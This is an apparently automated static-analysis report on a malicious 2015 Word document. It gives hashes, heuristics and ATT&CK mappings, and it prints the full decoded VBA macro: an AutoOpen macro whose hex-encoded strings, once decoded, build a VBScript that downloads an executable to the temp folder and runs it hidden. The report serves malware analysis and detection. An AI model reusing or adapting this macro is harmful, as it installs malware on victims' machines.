Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ae16de2ce0f90a0…

MALICIOUS

Office (OLE)

35.0 KB Created: 2015-03-18 23:09:00 Authoring application: Microsoft Office Word First seen: 2015-04-15
MD5: 5dab27a18a2851cf1dcae95662a01906 SHA-1: fc7ebf9cbc7e5e794474775b3ca457cacde46d6a SHA-256: 2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a critical heuristic for an obfuscated auto-exec VBA loader, indicating malicious intent. The VBA script attempts to execute a PowerShell command by decoding a hex string, which likely downloads and runs a second-stage payload. The script also constructs a temporary file path 'dffsdf.exe' for execution.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell sdddd, 0
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Shell sdddd, 0
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3015 bytes
SHA-256: 337a02b601b2f5526861314b997f4da6f2c0b6ec50dbce30914cd8d739aca416
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
sdf
End Sub

Attribute VB_Name = "Module1"
Sub sdf()
jFHGVCsdf = HJbjbkljgIUGI("406563686f20677975465946477569676464642e53656e643e3e677975465946477569672e766273202620406563686f2053657420656e7669726f6e6d656e7456617273203d20575363726970742e4372656174654f626a6563742822575363726970742e5368656c6c22292e456e7669726f6e6d656e74282250726f6365737322293e3e677975465946477569672e766273202620406563686f2074656d70466f6c646572203d20656e7669726f6e6d656e7456617273282254454d5022293e3e677975465946477569672e766273202620406563686f2046696c656f70656e203d2074656d70466f6c646572202b20225c646673646666662e657865223e3e677975465946477569672e766273202620406563686f207769746820625374726d3e3e677975465946477569672e766273202620406563686f202020202e74797065203d2031203e3e677975465946477569672e766273202620406563686f20202020202e6f70656e3e3e677975465946477569672e766273202620406563686f20202020202e777269746520677975465946477569676464642e726573706f6e7365426f64793e3e677975465946477569672e766273202620")
JJKJJJJJJJJJJJJd = HJbjbkljgIUGI(StrReverse("026202372667e276965774649564579776e3e35637c6166402c222669676e24303567616d696f297d687a73716f2335323e27383e2135323e2834313f2f2a3074747862202c2224554742202e65607f4e24646467696577464956457977602f686365604026202372667e276965774649564579776e3e39222d61656274735e22646f646142282473656a626f656471656273602d302d6274735260247563502a3d62747352602d6964602f686365604026202372667e276965774649564579776e3922205454584c4d485e24766f637f6273696d42282473656a626f656471656273602d302464646769657746495645797760247563502a34646467696577464956457977602d6964602f6863656040236f202568756e246d636"))
GFGsdjfhf = HJbjbkljgIUGI("406563686f20202020202e73617665746f66696c652046696c656f70656e2c2032203e3e677975465946477569672e766273202620406563686f20656e6420776974683e3e677975465946477569672e766273202620406563686f205365742047424976697669753637465547424b203d204372656174654f626a65637428225368656c6c2e4170706c69636174696f6e22293e3e677975465946477569672e766273202620406563686f2047424976697669753637465547424b2e4f70656e2046696c656f70656e3e3e677975465946477569672e766273202620637363726970742e65786520677975465946477569672e766273")
sdddd = JJKJJJJJJJJJJJJd + jFHGVCsdf + GFGsdjfhf
Shell sdddd, 0
End Sub


Attribute VB_Name = "Module2"
Public Function HJbjbkljgIUGI(ByVal kZtkbozi As String) As String
Dim CqINRagdDXnLii12, JvigRuKAuHzAIK17 As Integer
JvigRuKAuHzAIK17 = 2912
For CqINRagdDXnLii12 = 0 To 65
JvigRuKAuHzAIK17 = JvigRuKAuHzAIK17 + CqINRagdDXnLii12
DoEvents
Next CqINRagdDXnLii12

For TQmHIRcQAPjC = 1 To Len(kZtkbozi) Step 2
UGiEQf = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(kZtkbozi, TQmHIRcQAPjC, 2)))
ePUuigaspLiGL = ePUuigaspLiGL & UGiEQf
Next TQmHIRcQAPjC
HJbjbkljgIUGI = ePUuigaspLiGL
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.